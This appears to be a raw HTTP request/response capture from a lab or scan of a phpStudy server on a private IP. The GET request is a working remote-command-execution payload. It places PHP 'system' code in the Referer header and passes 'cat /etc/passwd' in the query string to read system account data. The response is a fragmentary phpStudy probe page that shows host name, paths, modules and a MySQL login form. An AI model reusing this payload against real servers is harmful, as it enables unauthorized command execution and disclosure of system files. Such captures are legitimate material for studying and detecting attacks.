GET /pte/plus/flink.php?c=cat%20/etc/passwd&dopost=save HTTP/1.1
Host: 192.168.203.178
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Referer: <?php "system"($c);die;/*ref
Accept-Encoding: gzip




ext-align: right; font-weight: bold; color: #06C;}
#lnmplink2 a {color: #0000FF; text-decoration: underline;}
.w_small{font-family: Courier New;}
.w_number{color: #f800fe;}
.sudu {padding: 0; background:#5dafd1; }
.suduk { margin:0px; padding:0;}
.resNo{color: #FF0000;}
.word{word-break:break-all;}
-->
</style>

</head>
<body>

<div id="page">
    <div id="header">
        <h1>phpStudy </h1>
         <div id="lnmplink"><a href="./list.htm" target="_blank">PHP</a></div>
         
         <div id="lnmplink2">not <a href="http://www.phpstudy.net/a.php/192.html" target="_blank"> phpStudy </a></div>
    </div>

<!---->
<table width="100%" cellpadding="3" cellspacing="0">
  <tr><th colspan="4"></th></tr>
  <tr>
    <td>/IP</td>
    <td colspan="3">192.168.203.178(192.168.203.178)</td>
  </tr>
  <tr>
    <td></td>
    <td colspan="3">Windows NT DESKTOP-0E6SVBJ 6.2 build 9200 (Windows 8 Business Edition) AMD64</td>
  </tr>
  <tr>
    <td width="13%"></td>
    <td width="37%">Windows &nbsp;NT</td>
    <td width="13%"></td>
    <td width="37%">Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02</td>
  </tr>
  <tr>
    <td></td>
    <td></td>
    <td></td>
    <td>80</td>
  </tr>
  <tr>
	


  <td></td>
	  <td>DESKTOP-0E6SVBJ</td>
	  <td></td>
	  <td>C:/phpstudy_pro/WWW</td>
	</tr>
  <tr>
	  <td></td>
	  <td>admin@example.com</td>
		<td></td>
		<td>C:/phpstudy_pro/WWW/index.php</td>
	</tr>
</table>


<table width="100%" cellpadding="3" cellspacing="0" align="center">
  <tr>
    <th colspan="4">PHP</th>
  </tr>
  <tr>
    <td colspan="4"><span class="w_small">
Core&nbsp;&nbsp;bcmath&nbsp;&nbsp;calendar&nbsp;&nbsp;ctype&nbsp;&nbsp;date&nbsp;&nbsp;ereg&nbsp;&nbsp;filter&nbsp;&nbsp;ftp&nbsp;&nbsp;hash&nbsp;&nbsp;iconv&nbsp;&nbsp;json&nbsp;&nbsp;mcrypt&nbsp;&nbsp;SPL&nbsp;&nbsp;<br />odbc&nbsp;&nbsp;pcre&nbsp;&nbsp;Reflection&nbsp;&nbsp;session&nbsp;&nbsp;standard&nbsp;&nbsp;mysqlnd&nbsp;&nbsp;tokenizer&nbsp;&nbsp;zip&nbsp;&nbsp;zlib&nbsp;&nbsp;libxml&nbsp;&nbsp;dom&nbsp;&nbsp;PDO&nbsp;&nbsp;openssl&nbsp;&nbsp;<br />SimpleXML&nbsp;&nbsp;wddx&nbsp;&nbsp;xml&nbsp;&nbsp;xmlreader&nbsp;&nbsp;xmlwriter&nbsp;&nbsp;cgi-fcgi&nbsp;&nbsp;curl&nbsp;&nbsp;fileinfo&nbsp;&nbsp;gd&nbsp;&nbsp;mbstring&nbsp;&nbsp;mysql&nbsp;&nbsp;mysqli&nbsp;&nbsp;Phar&nbsp;&nbsp;<br />pdo_mysql&nbsp;&nbsp;pdo_sqlite&nbsp;&nbsp;mhash&nbsp;&nbsp;</span>
    </td>
  </tr>
</table>
<table width="100%" cellpadding="3" cellspacing="0" align="center">
  <tr><th colspan="4">PHP</th></tr>
  <tr>
    <td width="32%">PHPphpinfo</td>
    <t


  <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>DBA </td>
    <td><font color="red"></font></td>
    <td>DBM </td>
    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>FilePro </td>
    <td><font color="red"></font></td>
    <td>SyBase </td>
    <td><font color="red"></font></td>
  </tr> 
</table>

<form action="/index.php#bottom" method="post">
<!--MySQL-->
<table width="100%" cellpadding="3" cellspacing="0" align="center">
	<tr><th colspan="3">MySQL</th></tr>
  <tr>
    <td width="15%"></td>
    <td width="60%">
      <input type="text" name="host" value="localhost" size="10" />
      <input type="text" name="port" value="3306" size="10" />
      <input type="text" name="login" size="10" />
      <input type="password" name="password" size="10" />
    </td>
    <td width="25%">
      <input class="btn" type="submit" name="act" value="MySQL" />
    </td>
  </tr>
</table>
  <!---->
<table width="100%" cellpadding="3" cellspacing="0" align="center">
	<tr><th colspan="3"></th></tr>
  <tr>
    <td width="15%"></td>
    <td width="60%">
      
      <input type="text" name="funName" size="50" />
    </td>
    <td width="25%">
      <input class="btn" type="submit" name="act" alig


n="right" value="" />
    </td>
  </tr>
  </table>

</form>

<div id="footer">
<p>phpStudyApache+Nginx+IIS+Lighttpd+PHP+MySQL+phpMyAdmin+SQL-Front+Zend LoaderPHPPHPPHPWINDOWS
 <a href="http://www.phpstudy.net/" target="_blank">www.phpstudy.net</a></p>
</div>

</div>
</body>
</html>
0




